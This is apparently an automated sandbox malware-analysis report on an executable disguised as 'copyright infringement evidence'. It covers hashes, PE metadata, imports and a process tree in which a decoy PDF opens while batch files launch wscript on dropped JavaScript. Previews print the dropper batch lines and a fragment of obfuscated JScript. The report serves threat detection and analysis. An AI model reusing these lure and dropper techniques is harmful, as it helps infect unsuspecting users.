                                                                                                        SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                                                        MD5:7113425405A05E110DC458BBF93F608A
                                                                                                        SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                                                        SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                                                        SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                                                        Malicious:false
                                                                                                        Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):737
                                                                                                        Entropy (8bit):7.501268097735403
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                                                        MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                                                        SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                                                        SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                                                        SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                                                        Malicious:false
                                                                                                        Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14456
                                                                                                        Entropy (8bit):4.2098179599164975
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ
                                                                                                        MD5:32FCA302C8B872738373D7CCB1E75FD4
                                                                                                        SHA1:DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1
                                                                                                        SHA-256:CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6
                                                                                                        SHA-512:57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F
                                                                                                        Malicious:false
                                                                                                        Preview:%PPKLITE-2.1.%......1 0 obj.<</PPK<</AddressBook<</Entries[2 0 R 3 0 R 4 0 R 5 0 R 6 0 R]/NextID 1006/Type/AddressBook>>/Type/PPK/User<</Type/User>>/V 65537>>/Type/Catalog>>.endobj.2 0 obj.<</ABEType 1/Cert<308204A130820389A00302010202043E1CBD28300D06092A864886F70D01010505003069310B300906035504061302555331233021060355040A131A41646F62652053797374656D7320496E636F72706F7261746564311D301B060355040B131441646F6265205472757374205365727669636573311630140603550403130D41646F626520526F6F74204341301E170D3033303130383233333732335A170D3233303130393030303732335A3069310B300906035504061302555331233021060355040A131A41646F62652053797374656D7320496E636F72706F7261746564311D301B060355040B131441646F6265205472757374205365727669636573311630140603550403130D41646F626520526F6F7420434130820122300D06092A864886F70D01010105000382010F003082010A0282010100CC4F5484F7A7A2E733537F3F9C12886B2C9947677E0F1EB9AD1488F9C310D81DF0F0D59F690A2F5935B0CC6CA94C9C15A09FCE20BFA0CF54E2E02066453F3986387E9CC48E0722C624F60112B035DF55EA6990B
                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3346
                                                                                                        Entropy (8bit):3.544995346037922
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:jzjv7G+jG8GtJzlZ26LR8liJlp0lWHvHLuYim52fK:L73jlEtb26COz0oHvHjiY
                                                                                                        MD5:2AB1E706A3A9EC6BEAE89F1D2E3EFDC4
                                                                                                        SHA1:23AE80738C32702DE9F389843C3DD86AD55A1A65
                                                                                                        SHA-256:603210328276F46BD63203124164E210FDCE27359E003FB3CEA410CB944EB4FF
                                                                                                        SHA-512:9C61DE18489E5B9E88780537902CB73D2D222030F250CA40C5176C018ADEF1AEAEBC56F042B1A52B93050A36674A34B6F8BCA4BC037EE3D45530C056AAA5E4EE
                                                                                                        Malicious:true
                                                                                                        Preview:.. . . . . . . . .v.a.r. .c.h.a.n.t.o.e.i.r.a. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).;..... . . . . . . . .v.a.r. .o.l.i.g.i.s.t.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".).;..... . . . . . . . .v.a.r. .m.o.c.o.c.o.n.a. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.A.P.P.D.A.T.A.%.".).;..... . . . . . . . .v.a.r. .a.f.e.r.r.e.t.o.a.r. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.U.S.E.R.P.R.O.F.I.L.E.%.".).;..... . . . . . . . .v.a.r. .s.e.t.i.a. .=. .o.l.i.g.i.s.t.o...E.x.p.a.n.d.E.n.v.i.r.o.n.m.e.n.t.S.t.r.i.n.g.s.(.".%.T.E.M.P.%.".).;..... . . . . . . . .v.a.r. .a.c.e.f.a.l.i.t.a.s. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).;..... . . . . . . . .v.a.r. .t.e.o.r.i.s.t.a. .=. .v.a.s.s.o.i.r.a.r.(.".s" ..2 .." .J( ."+".).;..... . . . . . . . .v.a.r. .m.a.r.g.a.l.h.u.d.o. .=. .v.a.
                                                                                                        Process:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        File Type:DOS batch file, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):4.658214015923013
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:mKDDUXM7lOaHF5hdCl+FOAvBR:hrcaH9dCeRn
                                                                                                        MD5:E3DC94D7ECC8631EC2A2F84F40103B21
                                                                                                        SHA1:895BBFD4F61D39AB6AEF4899E6297C5812076A36
                                                                                                        SHA-256:460187A2F3E0038DC91189D41FF149AF951740BBA86E9BF31FB0AF7BF1D51A30
                                                                                                        SHA-512:374E3F4122D0E2997E8F13B43F8BDF57AAAFAAB00C914DC535DB02060BEBBFB7CC8B215C2DD724593589A7FAADAFFDB70322C87ADCABE5B4A8AC4059DC7464F9
                                                                                                        Malicious:true
                                                                                                        Preview:@echo off.wscript.exe "C:\Users\Public\Documents\2p_bee.js".exit
                                                                                                        Process:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        File Type:DOS batch file, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):4.646418898701708
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:mKDDUXM7lOaHF5hdCl+NsAALIvBR:hrcaH9dCWhALSn
                                                                                                        MD5:10E046767A675EF989A48ECDF06C74FB
                                                                                                        SHA1:1CD11636BD73EB19E328C5B54E229DE2FC741BC8
                                                                                                        SHA-256:C6C6395FAA4C7C7FA7099D14A81AB171F282C855A093C92E69D5FE36E38096D2
                                                                                                        SHA-512:8F0CB2B939344297251C13ED43BD0C6CE17D10CA76301A299977E966B7048746C31F94DA4EFD06E1A43C78065A5A5C3CA844A9C5D5171377D3C85193211BAA8E
                                                                                                        Malicious:true
                                                                                                        Preview:@echo off.wscript.exe "C:\Users\Public\Documents\2x_bee.js".exit
                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Entropy (8bit):6.1790509808787615
                                                                                                        TrID:
                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:copyright_infringement_evidence_1.exe
                                                                                                        File size:2'215'688 bytes
                                                                                                        MD5:8c04e5d5adaf15173fecd9384ceda14d
                                                                                                        SHA1:9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
                                                                                                        SHA256:31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
                                                                                                        SHA512:7616ce8a0728abedb084c516b47fe45b7af264458d9fa4edccebbd2f8e77fbc17a703f06e8e23b9c618a45176a6073f6a5b0727619adf30f620eac062d58c0fe
                                                                                                        SSDEEP:24576:X40Bg3buy6rMn3I5bF2Wlo7XGc6okgFZ5A1WqJlLsYpd+wyQn652pBJTu:DCruyinbFOR6PgFZmMqJ19pd+wpXa
                                                                                                        TLSH:EAA54A42F74689EAC469C1B48247A332FA71BC8D47347BDB5B948A713E11BD06F3C698
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8..$8...8.W.9...8.W.9...8.W.9...8.W.9...8Y..9...8M..9...8...8g..8...8y..8.VH8...8.V.9...8Rich...8...............
                                                                                                        Icon Hash:357561d6dad24d55
                                                                                                        Entrypoint:0x14014c4e8
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:true
                                                                                                        Imagebase:0x140000000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x66FAA098 [Mon Sep 30 12:59:04 2024 UTC]
                                                                                                        TLS Callbacks:0x40136850, 0x1
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:19182dc876641424b2d2a37a50cfbbc8
                                                                                                        Signature Valid:true
                                                                                                        Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                        Error Number:0
                                                                                                        Not Before, Not After
                                                                                                        • 30/09/2024 09:11:34 30/09/2025 09:11:33
                                                                                                        Subject Chain
                                                                                                        • CN="Xiamen Huixiantong Network Technology Co., Ltd.", O="Xiamen Huixiantong Network Technology Co., Ltd.", L=Xiamen, S=Fujian, C=CN, SERIALNUMBER=91350211MA31JF8419, OID.1.3.6.1.4.1.311.60.2.1.1=Xiamen, OID.1.3.6.1.4.1.311.60.2.1.2=Fujian, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                        Version:3
                                                                                                        Thumbprint MD5:A7EEF95F5BB4BCEB5DE91A14E42E20D4
                                                                                                        Thumbprint SHA-1:B0D949125202A88EF756E702FF910631B5E1C674
                                                                                                        Thumbprint SHA-256:8C786FFEBDA1DDDCDE787060F8C35F54BA334CE4216CC1285998097C312A8069
                                                                                                        Serial:4AEA2FD2D3DD61D454B29A9035C7443E
                                                                                                        Instruction
                                                                                                        dec eax
                                                                                                        sub esp, 28h
                                                                                                        call 00007FAAF0844610h
                                                                                                        dec eax
                                                                                                        add esp, 28h
                                                                                                        jmp 00007FAAF08441A7h
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        nop word ptr [eax+eax+00000000h]
                                                                                                        dec eax
                                                                                                        sub esp, 10h
                                                                                                        dec esp
                                                                                                        mov dword ptr [esp], edx
                                                                                                        dec esp
                                                                                                        mov dword ptr [esp+08h], ebx
                                                                                                        dec ebp
                                                                                                        xor ebx, ebx
                                                                                                        dec esp
                                                                                                        lea edx, dword ptr [esp+18h]
                                                                                                        dec esp
                                                                                                        sub edx, eax
                                                                                                        dec ebp
                                                                                                        cmovb edx, ebx
                                                                                                        dec esp
                                                                                                        mov ebx, dword ptr [00000010h]
                                                                                                        dec ebp
                                                                                                        cmp edx, ebx
                                                                                                        jnc 00007FAAF0844348h
                                                                                                        inc cx
                                                                                                        and edx, 8D4DF000h
                                                                                                        wait
                                                                                                        add al, dh
                                                                                                        Programming Language:
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1fdd940x140.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x20d0000xc560.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2040000x8730.pdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x21a6000x2908.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x21a0000x4634.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1f69800x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1f6a000x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1f68400x140.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x15a0000x5d0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x1587df0x158800db01c345a209d9f60c9c7e456254ffb3False0.47945391872278664zlib compressed data6.248257741907354IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x15a0000xa53380xa5400777a1b827912855a4e4d057ffdd478a3False0.3238301933623298data5.195598230453754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x2000000x32100x30007104f5ce44ae04abca4b9d1976a680e5False0.162841796875data2.3943608536822434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .pdata0x2040000x87300x88008cb9d4a03646f14ba08d51e0da4d361dFalse0.5119485294117647data5.930548283446855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x20d0000xc5600xc600130c52a52841a70d2ae22ec98340bc01False0.234375data4.5015135880055395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x21a0000x46340x480094ef51185fb70b9000b1cbb86355f996False0.4402126736111111data5.43325235096044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0x20d4800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9696826892868363
                                                                                                        RT_ICON0x20ed600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.08974964572508266
                                                                                                        RT_ICON0x212f880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.12935684647302906
                                                                                                        RT_ICON0x2155300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.16553254437869822
                                                                                                        RT_ICON0x216f980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.21106941838649157
                                                                                                        RT_ICON0x2180400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.29508196721311475
                                                                                                        RT_ICON0x2189c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.33313953488372094
                                                                                                        RT_ICON0x2190800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4592198581560284
                                                                                                        RT_GROUP_ICON0x2194e80x76dataEnglishUnited States0.7457627118644068
                                                                                                        RT_VERSION0x20d2400x23cdataEnglishUnited States0.46678321678321677
                                                                                                        DLLImport
                                                                                                        api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WaitOnAddress, WakeByAddressSingle
                                                                                                        bcryptprimitives.dllProcessPrng
                                                                                                        KERNEL32.dllGetCurrentProcess, DuplicateHandle, SetHandleInformation, CreateIoCompletionPort, GetQueuedCompletionStatusEx, PostQueuedCompletionStatus, ReadFile, GetOverlappedResult, SetFileCompletionNotificationModes, Sleep, GetModuleHandleA, GetProcAddress, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, GetLastError, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SwitchToThread, CreateWaitableTimerExW, SetWaitableTimer, WaitForSingleObject, QueryPerformanceCounter, GetSystemInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, SetFileInformationByHandle, GetStdHandle, GetCurrentProcessId, WriteFileEx, SleepEx, GetExitCodeProcess, QueryPerformanceFrequency, HeapFree, HeapReAlloc, lstrlenW, ReleaseMutex, GetProcessHeap, HeapAlloc, FindClose, CreateFileW, GetFileInformationByHandle, GetFileInformationByHandleEx, CreateDirectoryW, FindFirstFileW, GetFinalPathNameByHandleW, CreateEventW, CancelIo, GetConsoleMode, GetModuleHandleW, FormatMessageW, GetModuleFileNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, InitializeSListHead, GetSystemTimeAsFileTime, IsDebuggerPresent, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentThreadId, IsProcessorFeaturePresent
                                                                                                        bcrypt.dllBCryptGenRandom
                                                                                                        ADVAPI32.dllRegCloseKey, RegQueryValueExW, RegOpenKeyExW, SystemFunction036
                                                                                                        secur32.dllEncryptMessage, DeleteSecurityContext, DecryptMessage, QueryContextAttributesW, FreeContextBuffer, InitializeSecurityContextW, AcquireCredentialsHandleA, FreeCredentialsHandle, ApplyControlToken, AcceptSecurityContext
                                                                                                        ws2_32.dllfreeaddrinfo, WSAGetLastError, WSAIoctl, setsockopt, WSAStartup, WSASend, send, getaddrinfo, recv, shutdown, getsockopt, ioctlsocket, connect, bind, WSASocketW, getsockname, getpeername, WSACleanup, closesocket
                                                                                                        crypt32.dllCertOpenStore, CertEnumCertificatesInStore, CertCloseStore, CertFreeCertificateChain, CertDuplicateCertificateChain, CertFreeCertificateContext, CertDuplicateCertificateContext, CertVerifyCertificateChainPolicy, CertDuplicateStore, CertAddCertificateContextToStore, CertGetCertificateChain
                                                                                                        ntdll.dllNtCreateFile, RtlNtStatusToDosError, NtCancelIoFileEx, NtReadFile, NtDeviceIoControlFile, NtWriteFile
                                                                                                        VCRUNTIME140.dllmemset, memcmp, memmove, __current_exception_context, __CxxFrameHandler3, __current_exception, __C_specific_handler, memcpy
                                                                                                        api-ms-win-crt-math-l1-1-0.dll__setusermatherr, pow
                                                                                                        api-ms-win-crt-runtime-l1-1-0.dllexit, _exit, __p___argc, __p___argv, _cexit, _c_exit, _initialize_narrow_environment, _initterm_e, _get_initial_narrow_environment, _configure_narrow_argv, _initialize_onexit_table, _register_onexit_function, _crt_atexit, terminate, _initterm, _seh_filter_exe, _set_app_type, _register_thread_local_exe_atexit_callback
                                                                                                        api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                                                                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                                        api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        No network behavior found

                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:20:14:56
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
                                                                                                        Imagebase:0x7ff7a1780000
                                                                                                        File size:2'215'688 bytes
                                                                                                        MD5 hash:8C04E5D5ADAF15173FECD9384CEDA14D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:20:15:01
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:20:15:01
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:20:15:02
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
                                                                                                        Imagebase:0x7ff686a00000
                                                                                                        File size:5'641'176 bytes
                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:5
                                                                                                        Start time:20:15:02
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x7ff6413e0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:7
                                                                                                        Start time:20:15:03
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x7ff6413e0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:8
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"wscript.exe" C:\Users\Public\Documents\2p_bee.js
                                                                                                        Imagebase:0x7ff7d3820000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd" /C echo %username%
                                                                                                        Imagebase:0x7ff66ff50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:20:15:05
                                                                                                        Start date:07/10/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"wscript.exe" C:\Users\Public\Documents\2x_bee.js
                                                                                                        Imagebase:0x7ff7d3820000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
